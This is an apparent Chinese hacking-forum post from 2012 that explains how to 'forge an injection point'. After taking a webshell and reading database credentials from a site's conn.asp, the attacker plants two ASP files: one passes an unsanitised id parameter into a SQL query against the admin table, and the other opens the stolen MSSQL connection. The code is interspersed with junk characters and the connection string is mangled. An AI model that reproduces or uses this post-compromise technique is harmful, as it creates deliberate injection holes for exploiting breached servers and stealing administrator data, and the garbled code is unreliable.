找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1850|回复: 0
打印 上一主题 下一主题

伪造注入点方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:08 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:4 V& p1 S! K1 l( i1 \9 y$ M) ?
ASP/Visual Basic代码8 p2 j8 _: l; c, z9 |6 J3 c
<!--#include file="xx.asp"-->   
8 X( F# L# W6 f; C7 n<%    # E# u& X' A$ F' |* w
set rs=server.createobject("ADODB.recordset")    * m: I$ Q  U3 D! I
id = request("id")    . w& k7 B8 m4 h8 a( n. p
strSQL = "select * from admin where id=" & id    ' u" A. n- t& F( V. S( n2 R8 Z
rs.open strSQL,conn,1,3   
' R$ d5 a4 ], R" a4 `6 {8 [rs.close   
% ?& N' t( ^' O% p0 q8 `4 K/ ?  n: U%>  
# f- n( ~; x2 K* I把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
8 q2 t6 T5 s; K# o  J然后就要构造一个连接数据库的文件了,代码如下:
& _9 y2 J' J- XASP/Visual Basic代码" }7 t3 \" L/ O
<%            
# x; Q, D; f9 T4 S) x+ HstrSQLServerName = "000.000.000.000"     '服务器名称或地址    / ^: S2 S' m# m
strSQLDBUserName = "sqlname"         '数据库帐号    4 e% Z5 S/ a  G# C/ h
strSQLDBPassword = "sqlpass"         '数据库密码      R" c1 A9 q1 d
strSQLDBName = "sqldataname"           '数据库名称    ; _- M4 L+ L! k- H. {8 t
Set conn = Server.CreateObject("ADODB.Connection")    4 I1 i3 P5 ~& o8 h" w( H
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"   - Y( Y; \0 _) h5 u& p
conn.open strCon   
  z" f/ X3 k: a9 a3 `%>  
1 c2 {7 I- p7 K' R9 A: ], I/ u这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功
& h9 J) o% l) [3 H- P$ k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表